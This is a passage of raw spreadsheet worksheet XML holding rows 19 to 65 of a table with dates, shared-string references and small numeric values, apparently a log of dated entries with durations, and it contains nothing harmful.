      </c>
      <c r="I19" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J19" s="8">
        <v>25</v>
      </c>
      <c r="K19" s="60" t="s">
        <v>456</v>
      </c>
    </row>
    <row r="20" spans="1:11" ht="45.75">
      <c r="A20" s="6">
        <v>45152</v>
      </c>
      <c r="B20" s="2" t="s">
        <v>262</v>
      </c>
      <c r="C20" s="10" t="s">
        <v>448</v>
      </c>
      <c r="D20" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E20">
        <v>18</v>
      </c>
      <c r="F20" t="s">
        <v>427</v>
      </c>
      <c r="G20" t="s">
        <v>421</v>
      </c>
      <c r="H20" t="s">
        <v>457</v>
      </c>
      <c r="I20" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J20" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="21" spans="1:11" ht="45.75">
      <c r="A21" s="6">
        <v>45152</v>
      </c>
      <c r="B21" s="2" t="s">
        <v>458</v>
      </c>
      <c r="C21" s="10" t="s">
        <v>459</v>
      </c>
      <c r="D21" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E21">
        <v>201</v>
      </c>
      <c r="F21" t="s">
        <v>37</v>
      </c>
      <c r="G21" t="s">
        <v>421</v>
      </c>
      <c r="H21" t="s">
        <v>460</v>
      </c>
      <c r="I21" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J21" s="8">
        <v>30</v>
      </c>
      <c r="K21" t="s">
        <v>461</v>
      </c>
    </row>
    <row r="22" spans="1:11" ht="30.75">
      <c r="A22" s="6">
        <v>45145</v>
      </c>
      <c r="B22" s="2" t="s">
        <v>278</v>
      </c>
      <c r="C22" s="10" t="s">
        <v>448</v>
      </c>
      <c r="D22" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E22">
        <v>24</v>
      </c>
      <c r="F22" t="s">
        <v>427</v>
      </c>
      <c r="G22" t="s">
        <v>421</v>
      </c>
      <c r="J22" s="8" t="s">
        <v>342</v>
      </c>
      <c r="K22" s="47" t="s">
        <v>462</v>
      </c>
    </row>
    <row r="23" spans="1:11" ht="30.75">
      <c r="A23" s="6">
        <v>45152</v>
      </c>
      <c r="B23" s="2" t="s">
        <v>284</v>
      </c>
      <c r="C23" s="10" t="s">
        <v>448</v>
      </c>
      <c r="D23" s="10" t="s">
        <v>30</v>
      </c>
      <c r="E23">
        <v>82</v>
      </c>
      <c r="F23" t="s">
        <v>190</v>
      </c>
      <c r="G23" t="s">
        <v>14</v>
      </c>
      <c r="H23" t="s">
        <v>85</v>
      </c>
      <c r="I23" s="20">
        <v>0</v>
      </c>
      <c r="J23" s="8">
        <v>35</v>
      </c>
      <c r="K23" t="s">
        <v>463</v>
      </c>
    </row>
    <row r="24" spans="1:11" ht="60.75">
      <c r="A24" s="6">
        <v>45153</v>
      </c>
      <c r="B24" s="2" t="s">
        <v>289</v>
      </c>
      <c r="C24" s="10" t="s">
        <v>448</v>
      </c>
      <c r="D24" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E24">
        <v>96</v>
      </c>
      <c r="F24" t="s">
        <v>37</v>
      </c>
      <c r="G24" t="s">
        <v>421</v>
      </c>
      <c r="H24" t="s">
        <v>457</v>
      </c>
      <c r="I24" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J24" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="25" spans="1:11" ht="45.75">
      <c r="A25" s="6">
        <v>45153</v>
      </c>
      <c r="B25" s="2" t="s">
        <v>294</v>
      </c>
      <c r="C25" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D25" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E25">
        <v>260</v>
      </c>
      <c r="F25" t="s">
        <v>140</v>
      </c>
      <c r="G25" t="s">
        <v>421</v>
      </c>
      <c r="H25" t="s">
        <v>464</v>
      </c>
      <c r="I25" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J25" s="8">
        <v>15</v>
      </c>
      <c r="K25" t="s">
        <v>465</v>
      </c>
    </row>
    <row r="26" spans="1:11" ht="45.75">
      <c r="A26" s="6">
        <v>45153</v>
      </c>
      <c r="B26" s="2" t="s">
        <v>297</v>
      </c>
      <c r="C26" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D26" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E26">
        <v>503</v>
      </c>
      <c r="F26" t="s">
        <v>37</v>
      </c>
      <c r="G26" t="s">
        <v>421</v>
      </c>
      <c r="H26" t="s">
        <v>457</v>
      </c>
      <c r="I26" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J26" s="8">
        <v>10</v>
      </c>
      <c r="K26" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="27" spans="1:11" ht="45.75">
      <c r="A27" s="6">
        <v>45153</v>
      </c>
      <c r="B27" s="2" t="s">
        <v>300</v>
      </c>
      <c r="C27" s="10" t="s">
        <v>459</v>
      </c>
      <c r="D27" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E27">
        <v>37</v>
      </c>
      <c r="F27" t="s">
        <v>37</v>
      </c>
      <c r="G27" t="s">
        <v>14</v>
      </c>
      <c r="H27" t="s">
        <v>85</v>
      </c>
      <c r="I27" s="108">
        <v>0</v>
      </c>
      <c r="J27" s="8">
        <v>25</v>
      </c>
      <c r="K27" t="s">
        <v>466</v>
      </c>
    </row>
    <row r="28" spans="1:11" ht="30.75">
      <c r="A28" s="6">
        <v>45153</v>
      </c>
      <c r="B28" s="2" t="s">
        <v>304</v>
      </c>
      <c r="C28" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D28" s="10" t="s">
        <v>30</v>
      </c>
      <c r="E28">
        <v>142</v>
      </c>
      <c r="F28" t="s">
        <v>227</v>
      </c>
      <c r="G28" t="s">
        <v>421</v>
      </c>
      <c r="H28" t="s">
        <v>467</v>
      </c>
      <c r="I28" s="20" t="s">
        <v>435</v>
      </c>
      <c r="J28" s="8">
        <v>10</v>
      </c>
      <c r="K28" t="s">
        <v>468</v>
      </c>
    </row>
    <row r="29" spans="1:11" ht="30.75">
      <c r="A29" s="6">
        <v>45154</v>
      </c>
      <c r="B29" s="2" t="s">
        <v>307</v>
      </c>
      <c r="C29" s="10" t="s">
        <v>469</v>
      </c>
      <c r="D29" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E29">
        <v>111</v>
      </c>
      <c r="F29" t="s">
        <v>427</v>
      </c>
      <c r="G29" t="s">
        <v>421</v>
      </c>
      <c r="H29" t="s">
        <v>470</v>
      </c>
      <c r="I29" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J29" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="30" spans="1:11" ht="30.75">
      <c r="A30" s="6">
        <v>45154</v>
      </c>
      <c r="B30" s="2" t="s">
        <v>311</v>
      </c>
      <c r="C30" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D30" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E30">
        <v>135</v>
      </c>
      <c r="F30" t="s">
        <v>140</v>
      </c>
      <c r="G30" t="s">
        <v>421</v>
      </c>
      <c r="H30" t="s">
        <v>471</v>
      </c>
      <c r="I30" s="20" t="s">
        <v>472</v>
      </c>
      <c r="J30" s="8">
        <v>15</v>
      </c>
      <c r="K30" t="s">
        <v>473</v>
      </c>
    </row>
    <row r="31" spans="1:11" ht="45.75">
      <c r="A31" s="6">
        <v>45154</v>
      </c>
      <c r="B31" s="2" t="s">
        <v>317</v>
      </c>
      <c r="C31" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D31" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E31">
        <v>329</v>
      </c>
      <c r="F31" t="s">
        <v>190</v>
      </c>
      <c r="G31" t="s">
        <v>14</v>
      </c>
      <c r="H31" t="s">
        <v>474</v>
      </c>
      <c r="I31" s="20" t="s">
        <v>455</v>
      </c>
      <c r="J31" s="8">
        <v>10</v>
      </c>
      <c r="K31" s="82" t="s">
        <v>475</v>
      </c>
    </row>
    <row r="32" spans="1:11" ht="45.75">
      <c r="A32" s="6">
        <v>45154</v>
      </c>
      <c r="B32" s="2" t="s">
        <v>322</v>
      </c>
      <c r="C32" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D32" s="10" t="s">
        <v>30</v>
      </c>
      <c r="E32">
        <v>151</v>
      </c>
      <c r="F32" t="s">
        <v>140</v>
      </c>
      <c r="G32" t="s">
        <v>14</v>
      </c>
      <c r="H32" t="s">
        <v>85</v>
      </c>
      <c r="I32" s="20" t="s">
        <v>455</v>
      </c>
      <c r="J32" s="8">
        <v>30</v>
      </c>
      <c r="K32" t="s">
        <v>476</v>
      </c>
    </row>
    <row r="33" spans="1:11" ht="45.75">
      <c r="A33" s="6">
        <v>45154</v>
      </c>
      <c r="B33" s="2" t="s">
        <v>327</v>
      </c>
      <c r="C33" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D33" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E33">
        <v>237</v>
      </c>
      <c r="F33" t="s">
        <v>427</v>
      </c>
      <c r="G33" t="s">
        <v>421</v>
      </c>
      <c r="H33" t="s">
        <v>477</v>
      </c>
      <c r="I33" s="20" t="s">
        <v>450</v>
      </c>
      <c r="J33" s="8">
        <v>30</v>
      </c>
    </row>
    <row r="34" spans="1:11" ht="45.75">
      <c r="A34" s="6">
        <v>45154</v>
      </c>
      <c r="B34" s="2" t="s">
        <v>331</v>
      </c>
      <c r="C34" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D34" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E34">
        <v>206</v>
      </c>
      <c r="F34" t="s">
        <v>427</v>
      </c>
      <c r="G34" t="s">
        <v>421</v>
      </c>
      <c r="H34" t="s">
        <v>478</v>
      </c>
      <c r="I34" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J34" s="8">
        <v>30</v>
      </c>
    </row>
    <row r="35" spans="1:11" ht="30.75">
      <c r="A35" s="6">
        <v>45154</v>
      </c>
      <c r="B35" s="2" t="s">
        <v>334</v>
      </c>
      <c r="C35" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D35" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E35">
        <v>128</v>
      </c>
      <c r="F35" t="s">
        <v>190</v>
      </c>
      <c r="G35" t="s">
        <v>14</v>
      </c>
      <c r="H35" t="s">
        <v>85</v>
      </c>
      <c r="I35" s="20">
        <v>0</v>
      </c>
      <c r="J35" s="8">
        <v>30</v>
      </c>
    </row>
    <row r="36" spans="1:11" ht="30.75">
      <c r="A36" s="6">
        <v>45148</v>
      </c>
      <c r="B36" s="2" t="s">
        <v>479</v>
      </c>
      <c r="C36" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D36" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E36">
        <v>433</v>
      </c>
      <c r="F36" t="s">
        <v>190</v>
      </c>
      <c r="G36" t="s">
        <v>421</v>
      </c>
      <c r="H36" t="s">
        <v>480</v>
      </c>
      <c r="I36" s="20" t="s">
        <v>450</v>
      </c>
      <c r="J36" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="37" spans="1:11" ht="30.75">
      <c r="A37" s="6">
        <v>45148</v>
      </c>
      <c r="B37" s="2" t="s">
        <v>481</v>
      </c>
      <c r="C37" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D37" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E37">
        <v>67</v>
      </c>
      <c r="F37" t="s">
        <v>37</v>
      </c>
      <c r="G37" t="s">
        <v>421</v>
      </c>
      <c r="H37" t="s">
        <v>482</v>
      </c>
      <c r="I37" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J37" s="8">
        <v>10</v>
      </c>
      <c r="K37" t="s">
        <v>483</v>
      </c>
    </row>
    <row r="38" spans="1:11" ht="45.75">
      <c r="A38" s="6">
        <v>45148</v>
      </c>
      <c r="B38" s="2" t="s">
        <v>484</v>
      </c>
      <c r="C38" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D38" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E38">
        <v>117</v>
      </c>
      <c r="F38" t="s">
        <v>140</v>
      </c>
      <c r="G38" t="s">
        <v>421</v>
      </c>
      <c r="H38" t="s">
        <v>485</v>
      </c>
      <c r="I38" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J38" s="8">
        <v>10</v>
      </c>
      <c r="K38" t="s">
        <v>483</v>
      </c>
    </row>
    <row r="39" spans="1:11" ht="30.75">
      <c r="A39" s="6">
        <v>45148</v>
      </c>
      <c r="B39" s="2" t="s">
        <v>486</v>
      </c>
      <c r="C39" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D39" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E39">
        <v>346</v>
      </c>
      <c r="F39" t="s">
        <v>190</v>
      </c>
      <c r="G39" t="s">
        <v>14</v>
      </c>
      <c r="H39" t="s">
        <v>85</v>
      </c>
      <c r="I39" s="108">
        <v>0</v>
      </c>
      <c r="J39" s="8">
        <v>30</v>
      </c>
    </row>
    <row r="40" spans="1:11" ht="30.75">
      <c r="A40" s="6">
        <v>45148</v>
      </c>
      <c r="B40" s="2" t="s">
        <v>487</v>
      </c>
      <c r="C40" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D40" s="10" t="s">
        <v>30</v>
      </c>
      <c r="E40">
        <v>106</v>
      </c>
      <c r="F40" t="s">
        <v>140</v>
      </c>
      <c r="G40" t="s">
        <v>421</v>
      </c>
      <c r="H40" t="s">
        <v>488</v>
      </c>
      <c r="I40" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J40" s="8">
        <v>10</v>
      </c>
      <c r="K40" t="s">
        <v>489</v>
      </c>
    </row>
    <row r="41" spans="1:11" ht="45.75">
      <c r="A41" s="6">
        <v>45148</v>
      </c>
      <c r="B41" s="2" t="s">
        <v>490</v>
      </c>
      <c r="C41" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D41" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E41">
        <v>238</v>
      </c>
      <c r="F41" t="s">
        <v>140</v>
      </c>
      <c r="G41" t="s">
        <v>421</v>
      </c>
      <c r="H41" t="s">
        <v>491</v>
      </c>
      <c r="I41" s="20" t="s">
        <v>472</v>
      </c>
      <c r="J41" s="8">
        <v>15</v>
      </c>
      <c r="K41" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="42" spans="1:11" ht="45.75">
      <c r="A42" s="6">
        <v>45148</v>
      </c>
      <c r="B42" s="2" t="s">
        <v>492</v>
      </c>
      <c r="C42" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D42" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E42">
        <v>73</v>
      </c>
      <c r="F42" t="s">
        <v>427</v>
      </c>
      <c r="G42" t="s">
        <v>421</v>
      </c>
      <c r="H42" t="s">
        <v>493</v>
      </c>
      <c r="I42" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J42" s="8">
        <v>30</v>
      </c>
      <c r="K42" t="s">
        <v>494</v>
      </c>
    </row>
    <row r="43" spans="1:11" ht="30.75">
      <c r="A43" s="6">
        <v>45147</v>
      </c>
      <c r="B43" s="2" t="s">
        <v>495</v>
      </c>
      <c r="C43" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D43" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E43">
        <v>33</v>
      </c>
      <c r="F43" t="s">
        <v>37</v>
      </c>
      <c r="G43" t="s">
        <v>14</v>
      </c>
      <c r="H43" s="48" t="s">
        <v>496</v>
      </c>
      <c r="I43" s="20">
        <v>0</v>
      </c>
      <c r="J43" s="8">
        <v>90</v>
      </c>
    </row>
    <row r="44" spans="1:11" ht="30.75">
      <c r="A44" s="6">
        <v>45147</v>
      </c>
      <c r="B44" s="2" t="s">
        <v>497</v>
      </c>
      <c r="C44" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D44" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E44">
        <v>148</v>
      </c>
      <c r="F44" t="s">
        <v>140</v>
      </c>
      <c r="G44" t="s">
        <v>421</v>
      </c>
      <c r="H44" t="s">
        <v>498</v>
      </c>
      <c r="I44" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J44" s="8">
        <v>15</v>
      </c>
      <c r="K44" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="45" spans="1:11" ht="45.75">
      <c r="A45" s="6">
        <v>45147</v>
      </c>
      <c r="B45" s="2" t="s">
        <v>500</v>
      </c>
      <c r="C45" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D45" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E45">
        <v>113</v>
      </c>
      <c r="F45" t="s">
        <v>37</v>
      </c>
      <c r="G45" t="s">
        <v>421</v>
      </c>
      <c r="H45" t="s">
        <v>501</v>
      </c>
      <c r="I45" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J45" s="8">
        <v>5</v>
      </c>
      <c r="K45" t="s">
        <v>502</v>
      </c>
    </row>
    <row r="46" spans="1:11" ht="45.75">
      <c r="A46" s="6">
        <v>45147</v>
      </c>
      <c r="B46" s="2" t="s">
        <v>503</v>
      </c>
      <c r="C46" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D46" s="10" t="s">
        <v>504</v>
      </c>
      <c r="E46">
        <v>50</v>
      </c>
      <c r="F46" t="s">
        <v>505</v>
      </c>
      <c r="G46" t="s">
        <v>421</v>
      </c>
      <c r="H46" t="s">
        <v>506</v>
      </c>
      <c r="I46" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J46" s="8">
        <v>40</v>
      </c>
      <c r="K46" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="47" spans="1:11" ht="30.75">
      <c r="A47" s="6">
        <v>45147</v>
      </c>
      <c r="B47" s="2" t="s">
        <v>508</v>
      </c>
      <c r="C47" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D47" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E47">
        <v>97</v>
      </c>
      <c r="F47" t="s">
        <v>37</v>
      </c>
      <c r="G47" t="s">
        <v>421</v>
      </c>
      <c r="H47" t="s">
        <v>509</v>
      </c>
      <c r="I47" s="20" t="s">
        <v>510</v>
      </c>
      <c r="J47" s="8">
        <v>5</v>
      </c>
      <c r="K47" t="s">
        <v>483</v>
      </c>
    </row>
    <row r="48" spans="1:11" ht="45.75">
      <c r="A48" s="6">
        <v>45145</v>
      </c>
      <c r="B48" s="2" t="s">
        <v>511</v>
      </c>
      <c r="C48" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D48" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E48">
        <v>51</v>
      </c>
      <c r="F48" t="s">
        <v>140</v>
      </c>
      <c r="G48" t="s">
        <v>421</v>
      </c>
      <c r="H48" t="s">
        <v>512</v>
      </c>
      <c r="I48" s="20" t="s">
        <v>513</v>
      </c>
      <c r="J48" s="8">
        <v>30</v>
      </c>
      <c r="K48" t="s">
        <v>514</v>
      </c>
    </row>
    <row r="49" spans="1:11" ht="30.75">
      <c r="A49" s="6">
        <v>45145</v>
      </c>
      <c r="B49" s="2" t="s">
        <v>515</v>
      </c>
      <c r="C49" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D49" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E49">
        <v>244</v>
      </c>
      <c r="F49" t="s">
        <v>140</v>
      </c>
      <c r="G49" t="s">
        <v>421</v>
      </c>
      <c r="H49" t="s">
        <v>512</v>
      </c>
      <c r="I49" s="20" t="s">
        <v>513</v>
      </c>
      <c r="J49" s="8">
        <v>25</v>
      </c>
      <c r="K49" t="s">
        <v>516</v>
      </c>
    </row>
    <row r="50" spans="1:11" ht="45.75">
      <c r="A50" s="6">
        <v>45145</v>
      </c>
      <c r="B50" s="2" t="s">
        <v>517</v>
      </c>
      <c r="C50" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D50" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E50">
        <v>18</v>
      </c>
      <c r="F50" t="s">
        <v>140</v>
      </c>
      <c r="G50" t="s">
        <v>421</v>
      </c>
      <c r="H50" t="s">
        <v>518</v>
      </c>
      <c r="I50" s="20" t="s">
        <v>513</v>
      </c>
      <c r="J50" s="8">
        <v>25</v>
      </c>
      <c r="K50" t="s">
        <v>519</v>
      </c>
    </row>
    <row r="51" spans="1:11" ht="30.75">
      <c r="A51" s="6">
        <v>45145</v>
      </c>
      <c r="B51" s="2" t="s">
        <v>520</v>
      </c>
      <c r="C51" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D51" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E51">
        <v>28</v>
      </c>
      <c r="F51" t="s">
        <v>427</v>
      </c>
      <c r="G51" t="s">
        <v>421</v>
      </c>
      <c r="H51" t="s">
        <v>521</v>
      </c>
      <c r="I51" s="20" t="s">
        <v>522</v>
      </c>
      <c r="J51" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="52" spans="1:11" ht="30.75">
      <c r="A52" s="6">
        <v>45145</v>
      </c>
      <c r="B52" s="2" t="s">
        <v>523</v>
      </c>
      <c r="C52" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D52" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E52">
        <v>65</v>
      </c>
      <c r="F52" t="s">
        <v>190</v>
      </c>
      <c r="G52" t="s">
        <v>421</v>
      </c>
      <c r="H52" t="s">
        <v>524</v>
      </c>
      <c r="I52" s="20" t="s">
        <v>435</v>
      </c>
      <c r="J52" s="8">
        <v>10</v>
      </c>
      <c r="K52" t="s">
        <v>525</v>
      </c>
    </row>
    <row r="53" spans="1:11" ht="45.75">
      <c r="A53" s="6">
        <v>45145</v>
      </c>
      <c r="B53" s="2" t="s">
        <v>526</v>
      </c>
      <c r="C53" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D53" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E53">
        <v>348</v>
      </c>
      <c r="F53" t="s">
        <v>505</v>
      </c>
      <c r="G53" t="s">
        <v>421</v>
      </c>
      <c r="H53" t="s">
        <v>527</v>
      </c>
      <c r="I53" s="20" t="s">
        <v>528</v>
      </c>
      <c r="J53" s="8">
        <v>5</v>
      </c>
      <c r="K53" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="54" spans="1:11" ht="30.75">
      <c r="A54" s="6">
        <v>45145</v>
      </c>
      <c r="B54" s="2" t="s">
        <v>529</v>
      </c>
      <c r="C54" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D54" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E54">
        <v>47</v>
      </c>
      <c r="F54" t="s">
        <v>37</v>
      </c>
      <c r="G54" t="s">
        <v>421</v>
      </c>
      <c r="H54" t="s">
        <v>530</v>
      </c>
      <c r="I54" s="20" t="s">
        <v>513</v>
      </c>
      <c r="J54" s="8">
        <v>5</v>
      </c>
      <c r="K54" t="s">
        <v>531</v>
      </c>
    </row>
    <row r="55" spans="1:11" ht="30.75">
      <c r="A55" s="6">
        <v>45145</v>
      </c>
      <c r="B55" s="2" t="s">
        <v>532</v>
      </c>
      <c r="C55" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D55" s="10" t="s">
        <v>504</v>
      </c>
      <c r="E55">
        <v>94</v>
      </c>
      <c r="F55" t="s">
        <v>37</v>
      </c>
      <c r="G55" t="s">
        <v>421</v>
      </c>
      <c r="H55" t="s">
        <v>533</v>
      </c>
      <c r="I55" s="20" t="s">
        <v>450</v>
      </c>
      <c r="J55" s="8">
        <v>5</v>
      </c>
      <c r="K55" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="56" spans="1:11" ht="45.75">
      <c r="A56" s="6">
        <v>45145</v>
      </c>
      <c r="B56" s="2" t="s">
        <v>534</v>
      </c>
      <c r="C56" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D56" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E56">
        <v>79</v>
      </c>
      <c r="F56" t="s">
        <v>535</v>
      </c>
      <c r="G56" t="s">
        <v>421</v>
      </c>
      <c r="H56" t="s">
        <v>536</v>
      </c>
      <c r="I56" s="20" t="s">
        <v>537</v>
      </c>
      <c r="J56" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="57" spans="1:11" ht="30.75">
      <c r="A57" s="6">
        <v>45145</v>
      </c>
      <c r="B57" s="2" t="s">
        <v>538</v>
      </c>
      <c r="C57" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D57" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E57">
        <v>107</v>
      </c>
      <c r="F57" t="s">
        <v>427</v>
      </c>
      <c r="G57" t="s">
        <v>14</v>
      </c>
      <c r="H57" t="s">
        <v>539</v>
      </c>
      <c r="I57" s="20">
        <v>0</v>
      </c>
      <c r="J57" s="8">
        <v>60</v>
      </c>
    </row>
    <row r="58" spans="1:11" ht="30.75">
      <c r="A58" s="6">
        <v>45143</v>
      </c>
      <c r="B58" s="2" t="s">
        <v>540</v>
      </c>
      <c r="C58" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D58" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E58">
        <v>186</v>
      </c>
      <c r="F58" t="s">
        <v>227</v>
      </c>
      <c r="G58" t="s">
        <v>421</v>
      </c>
      <c r="H58" t="s">
        <v>541</v>
      </c>
      <c r="I58" s="20" t="s">
        <v>537</v>
      </c>
      <c r="J58" s="8">
        <v>30</v>
      </c>
      <c r="K58" t="s">
        <v>542</v>
      </c>
    </row>
    <row r="59" spans="1:11" ht="60.75">
      <c r="A59" s="6">
        <v>45143</v>
      </c>
      <c r="B59" s="2" t="s">
        <v>543</v>
      </c>
      <c r="C59" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D59" s="10" t="s">
        <v>30</v>
      </c>
      <c r="E59">
        <v>291</v>
      </c>
      <c r="F59" t="s">
        <v>190</v>
      </c>
      <c r="G59" s="17" t="s">
        <v>544</v>
      </c>
      <c r="H59" t="s">
        <v>545</v>
      </c>
      <c r="I59" s="20" t="s">
        <v>418</v>
      </c>
      <c r="J59" s="8">
        <v>120</v>
      </c>
      <c r="K59" t="s">
        <v>546</v>
      </c>
    </row>
    <row r="60" spans="1:11" ht="30.75">
      <c r="A60" s="6">
        <v>45143</v>
      </c>
      <c r="B60" s="2" t="s">
        <v>547</v>
      </c>
      <c r="C60" s="10" t="s">
        <v>459</v>
      </c>
      <c r="D60" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E60">
        <v>75</v>
      </c>
      <c r="F60" t="s">
        <v>37</v>
      </c>
      <c r="G60" t="s">
        <v>421</v>
      </c>
      <c r="H60" t="s">
        <v>548</v>
      </c>
      <c r="I60" s="20" t="s">
        <v>513</v>
      </c>
      <c r="J60" s="8">
        <v>45</v>
      </c>
      <c r="K60" t="s">
        <v>549</v>
      </c>
    </row>
    <row r="61" spans="1:11" ht="45.75">
      <c r="A61" s="6">
        <v>45142</v>
      </c>
      <c r="B61" s="2" t="s">
        <v>550</v>
      </c>
      <c r="C61" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D61" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E61">
        <v>54</v>
      </c>
      <c r="F61" t="s">
        <v>227</v>
      </c>
      <c r="G61" s="17" t="s">
        <v>416</v>
      </c>
      <c r="H61" t="s">
        <v>551</v>
      </c>
      <c r="I61" s="20" t="s">
        <v>418</v>
      </c>
      <c r="J61" s="8">
        <v>105</v>
      </c>
    </row>
    <row r="62" spans="1:11" ht="30.75">
      <c r="A62" s="6">
        <v>45142</v>
      </c>
      <c r="B62" s="2" t="s">
        <v>552</v>
      </c>
      <c r="C62" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D62" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E62">
        <v>76</v>
      </c>
      <c r="F62" t="s">
        <v>227</v>
      </c>
      <c r="G62" t="s">
        <v>421</v>
      </c>
      <c r="H62" t="s">
        <v>553</v>
      </c>
      <c r="I62" s="20" t="s">
        <v>537</v>
      </c>
      <c r="J62" s="8">
        <v>60</v>
      </c>
      <c r="K62" t="s">
        <v>554</v>
      </c>
    </row>
    <row r="63" spans="1:11" ht="30.75">
      <c r="A63" s="6">
        <v>45142</v>
      </c>
      <c r="B63" s="2" t="s">
        <v>555</v>
      </c>
      <c r="C63" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D63" s="10" t="s">
        <v>30</v>
      </c>
      <c r="E63">
        <v>79</v>
      </c>
      <c r="F63" t="s">
        <v>140</v>
      </c>
      <c r="G63" t="s">
        <v>421</v>
      </c>
      <c r="H63" t="s">
        <v>556</v>
      </c>
      <c r="I63" s="20" t="s">
        <v>557</v>
      </c>
      <c r="J63" s="8">
        <v>15</v>
      </c>
      <c r="K63" t="s">
        <v>558</v>
      </c>
    </row>
    <row r="64" spans="1:11" ht="45.75">
      <c r="A64" s="6">
        <v>45141</v>
      </c>
      <c r="B64" s="2" t="s">
        <v>559</v>
      </c>
      <c r="J64" s="8">
        <v>10</v>
      </c>
      <c r="K64" t="s">
        <v>560</v>
      </c>
    </row>
    <row r="65" spans="1:11" ht="30.75">
      <c r="A65" s="6">
        <v>45141</v>
      </c>
      <c r="B65" s="2" t="s">
        <v>561</v>
      </c>
      <c r="C65" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D65" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E65">
        <v>79</v>
      </c>
      <c r="F65" s="1" t="s">
        <v>140</v>
      </c>
      <c r="G65" s="1" t="s">
        <v>421</v>
      </c>
      <c r="H65" s="1" t="s">
        <v>562</v>
      </c>
      <c r="I65" s="19" t="s">
        <v>557</v>
      </c>
      <c r="J65" s="13">
        <v>60</v>
      </c>
      <c r="K65" s="1" t="s">
